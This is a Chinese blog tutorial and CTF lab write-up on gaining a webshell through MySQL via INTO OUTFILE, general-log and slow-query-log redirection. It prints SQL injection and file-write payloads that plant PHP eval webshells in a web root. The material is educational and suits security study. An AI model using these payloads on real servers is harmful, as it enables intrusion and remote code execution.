Mysql数据库getshell方法

已于 2024-04-16 21:12:46 修改
阅读量1k 收藏 6
点赞数 19
文章标签: 数据库 笔记 网络安全 mysql linux 网络 web安全
于 2024-04-02 14:17:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68408599/article/details/137266392
版权

今天摸鱼时候,突然有人问我不同的数据库getshell的方式,一时间我想到了mysql还有redis未授权访问到getshell的方式,但是仅仅第一时间只想到了这两种,我有查了查资料,找到了上面两种数据库getshell的补充,以及其他数据库getshell的方式。因此更新一个专栏,各个数据库getshell的方式。

目录

1.outfile和dumpfile写shell

条件

 命令参数

靶场

2.全局日志

条件

命令

3.慢查询getshell

前提

原理

命令参数

靶场

1.outfile和dumpfile写shell

条件

1.数据库当前用户为root权限

2.知道当前网站的绝对路径

3.PHP的GPC为 off状态(魔术引号,GET,POST,Cookie);

4.写入的那个路径有写入权限

 命令参数

show global variables like '%secure%';    ##查看secure-file-priv值
select group_concat(user,0x3a,file_priv) from mysql.user;         ##查看当前用户是否有写权限,Y代表有
select '<?php phpinfo() ?>' into outfile '/www/work/webshell.php'; ##写shell多种方式outfile,dumpfile,具体分析 若内容存在引号,会存在语法错误

靶场

ctfshow web171进行尝试:

可以看到是Y,有写入的权限

99' union select 1,2,group_concat(user,0x3a,file_priv) from mysql.user;%23

e9c406621955463f93b2342de783305b.png

可以看到写入成功了:

99' union select 1,2,"<?php eval($_POST[1]);?>" into outfile '/var/www/html/1.php;%23

74f2efd1a867420781f2c95ec1ccefad.png

接下来就可以执行命令找到flag了.

43951bef936441fda888ef795ce5873b.png

后续渗透可以在我以下这篇文章中找到:CSDN

这里不过多演示。

2.全局日志

条件

  • Web 文件夹宽松权限可以写入

  • Windows 系统下

  • 高权限运行 MySQL 或者 Apache

MySQL 5.0 版本以上会创建日志文件,可以通过修改日志的全局变量来 getshell

命令


show variables like '%general%'; set global general_log = on;
set global general_log_file = '/www/xx.php'; select '<?php eval($_POST['apple']);?>';
修改为原来路径,再关闭
set global general_log_file='/xxx/xxxx' set global general_log = off;

3.慢查询getshell

前提

1、知道网站真实物理路径

2、root用户身份

3、MySQL 版本 > 5.0

原理

慢查询日志,只有当查询语句执行的时间要超过系统默认的时间时,该语句才会被记入进慢查询日志一般都是通过long_query_time选项来设置这个时间值,时间以秒为单位,可以精确到微秒。如果查询时间超过了这个时间值,这个查询语句将被记录到慢查询日志中。

命令参数

查看服务器默认时间值方式如下:

show global variables like '%long_query_time%'
show global variables like '%long%'

查看慢日志参数:


show global variables like '%slow%'

对慢日志参数进行修改:

set global slow_query_log=1 #打开慢日志
set global slow_query_log_file='/var/www/html/1.php'#慢日志的路径
注意:一定要用双反斜杠
SELECT '<?php @eval($_POST[1]);?>' or sleep(11)
这儿11是超过慢日志的10秒时间

靶场

查询是否开启:

ff1df94ab3944799a0e59e588547f6b3.png

开启:

aafb6bb29b9c4c74bb174d772b7418aa.png

8eb0ccabecb24d5f9966f131002e5200.png

134733b598a740a2b88c4a338fb6e61b.png

c8aed40c29204f8ca6c2b1ac2a08fb7d.png

可以看到文件大小发生变化,文件写入成功了,这里不细利用,可以利用工具进行webshell连接。

 

 

 

B10SS0MS
关注
  • 19
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
linuxmysql备份shell脚本代码
01-10
第一步:在你的linux服务器中定义备份目录: .../bin/sh# mysql data backup script## use mysqldump –help,get more detail.#BakDir=/root/back/ysqlbackup LogFile=/root/back/mysql/mysqlbak.logDATE=`date +%Y%
mysql进行getshell方法
m0_55772907的博客
11-19 2036
getshell
mysql 备份getshell_数据库备份getshell
weixin_34712106的博客
02-03 656
0x00 前言很久之前通过数据库备份拿到的一个webshell,本来准备等他们修复了之后再写的,但是提交了漏洞和修复方案他们接收之后很长时间没有修复,忽视了漏洞。所以今天写出来了。0x01 多次尝试首先这个站是偶然google hacking时找到的后台弱密码,进入后台之后发现是IIS6.0的服务器:这个后台可以对前端的文章、新闻等进行修改,发现可以上传图片到文章中,是一个上传点。先编辑一个一句话...
mysql中getshell的方式
unexpectedthing的博客
03-17 4452
文章目录outfile和dumpfile写shell利用条件基于union联合查询:非联合查询outfile和dumpfile的区别secure_file_prive日志getshell慢日志getshell利用general_logbinlog的介绍 outfile和dumpfile写shell 利用条件 数据库当前用户为root权限; 知道当前网站的绝对路径; PHP的GPC为 off状态;(魔术引号,GET,POST,Cookie) 写入的那个路径存在写入权限。 基于union联合查询: ?i
mysql数据库shell_利用数据库shell的一些姿势
weixin_34569317的博客
01-26 2055
0x01、利用MySQL命令导出getshell利用条件:1、拥有网站的写入权限2、Secure_file_priv参数为空或者为指定路径3、知道网站的绝对路径方法:通过into outfile 进行文件写入,写入一句话木马CREATE TABLE shell(cmd text);INSERT INTO shell(cmd) VALUES('');SELECT cmd from shell INT...
linux-backup-script:用于备份home文件夹、任意文件夹、mysql数据库
07-02
用于备份home文件夹、任意文件夹、mysql数据库 可以分别控制data、mysql、S3的备份份数。 这是通过 2 个不同的文件进行管理的。 “备份”文件是可执行文件。 backup.config 文件用于设置可执行文件使用的配置。 此...
Introducing the MySQL 8 Document Store
06-21
This book covers the vitally important MySQL Document Store, the new X Protocol for developing applications, and a new client shell called the MySQL Shell. Also covered are supporting technologies ...
MySQL8.0.12下载安装配置方法
10-17
# 设置mysql数据库的数据的存放目录 datadir=D:\Program Files\mysql-8.0.12-winx64\data # 允许最大连接数 max_connections=200 # 允许连接失败的次数。 max_connect_errors=10 # 服务端使用的字符集默认为UTF8 ...
定时导出mysql本地数据替换远程数据库数据脚本分享
01-10
/bin/sh#code by scpman/usr/bin/find /usr/shell_clubs/auto_sql/ -name “*.sql” -mtime +3|xargs rm #del old sql#get new sqltime=`date +%Y%m%d`mysqldump -uroot -p123456 ser_a tb_a > /usr/shel
mysql事务(原理)
最新发布
m0_74347016的博客
05-19 525
mysql事务原理
数据库SQL编写规范-SQL书写规范整理(SQL语句书写规范全解-Word原件)
xx_123321456的博客
05-14 304
​​​​​​工作安排任务书,可行性分析报告,立项申请审批表,产品需求规格说明书,需求调研计划,用户需求调查单,用户需求说明书,概要设计说明书,技术解决方案,数据库设计说明书,详细设计说明书,单元测试报告,总体测试计划,单元测试计划,产品集成计划,集成测试报告,集成测试计划,系统测试报告,产品交接验收单,验收报告,验收测试报告,压力测试报告,项目总结报告,立项结项审批表,成本估算表,项目计划,项目周报月报,风险管理计划,质量保证措施,项目甘特图,项目管理工具,操作手册,接口设计文档,软件实施方案,运维方案,安
php centos选择sqlserver的驱动和扩展选择版本的说明
Z.X的博客
05-14 444
2023年2月23日13:41:48首先是php php扩展 驱动 数据库的关系 官方文档说明: https://learn.microsoft.com/zh-cn/sql/connect/php/step-1-configure-development-environment-for-php-development?view=sql-server-2017https://learn.microsoft.com/zh-cn/sql/connect/php/system-requirements-for-th
生产报表工具PI DataLInk 与 行列视之间的区别
2401_83701843的博客
05-17 250
行列视,全名“行列视生产数据应用系统”,行列视品牌所面对的业务范围远远超越了PIDatalink报表工具,他首先是一款本地部署的在线Excel文档管理系统,解决个人报表在线管理问题,其次,她和PIDataLInk一样,也是面向实时数据库报表需求的一套工具,其区别在于行列视品牌兼容国内外大多数实时数据库,也可以同时连接多个数据源,也就是她完全可以替代PI-DataLINk,同时也适用于其他品牌下的实时数据库系统;
MySQL存储过程添加二十万条数据日常练习
mi_mx的博客
05-17 305
【代码】MySQL日常练习。
【Golang】 MySQL 在 Go 语言驱动程序中常用参数
tr6666的博客
05-15 322
在 Go 语言中,我们使用数据库驱动程序来连接和操作数据库。对于 MySQL,我们通常使用 go-sql-driver/mysql 驱动程序。在使用这个驱动程序时,我们需要提供一个数据源名称(DSN),它是一个包含数据库连接信息的字符串。在这个字符串中,我们可以设置很多参数来控制驱动程序的行为。本文将介绍一些常用的参数。在 MySQL 的 Go 语言驱动程序中,我们可以通过设置 DSN 中的参数来控制驱动程序的行为。这些参数可以影响到连接的建立,数据的读写,以及数据的解析等各个方面。
CentOS8+MySQL8.0.26+Skywalking9.7.0数据清理机制
xiaozhanfeng的博客
05-15 795
#### 代码中定义的额外模型列,这些模型列在聚合或查询时不需要,会加重负载。但激活后,用户可以看到名称,更容易自行查询数据。##### 1级聚合到2级聚合的刷新时间,默认500毫秒。##### TOPN记录报告周期,默认10分钟。##### 执行数据持久化周期,默认25秒。##### 数据清理定时器,默认5分钟。##### 明细记录有效期,默认3天。##### 监测数据有效期,默认7天。##### 会话时间阈值,默认70秒。##### 数据清理开关,默认开启。
windows11 Django环境安装
云深海阔专栏
05-15 162
3)在这个文件夹中使用manager.py和runserver命令运行开发 web 服务器。2)使用 django-admin 工具创建一个名为“mytestsite”的新框架站点。浏览器上访问http://localhost:800。2、windows10 虚拟环境设置。1、验证python和pip3环境。1)创建文件夹及项目目录。4)web浏览器上验证。3、安装Django。
写一个备份mysql数据库shell脚本
02-18
我可以给你一个写一个备份mysql数据库shell脚本的示例:#!/bin/bash # This script will backup all databases# Set the backup folder BACKUP_DIR="/var/backups/mysql"# Set the date NOW="$(date +'%Y-%m-%d-%H-%M-%S')"# Create the backup directory mkdir -p $BACKUP_DIR/$NOW# Get the databases name databases=`mysql -u <username> -p<password> -e "SHOW DATABASES;" | tr -d "| " | grep -v Database`# Backup each database for db in $databases; do if [[ "$db" != "information_schema" ]] && [[ "$db" != _* ]] ; then echo "Dumping database: $db" mysqldump -u <username> -p<password> --databases $db > $BACKUP_DIR/$NOW/$db.sql fi done

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

B10SS0MS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值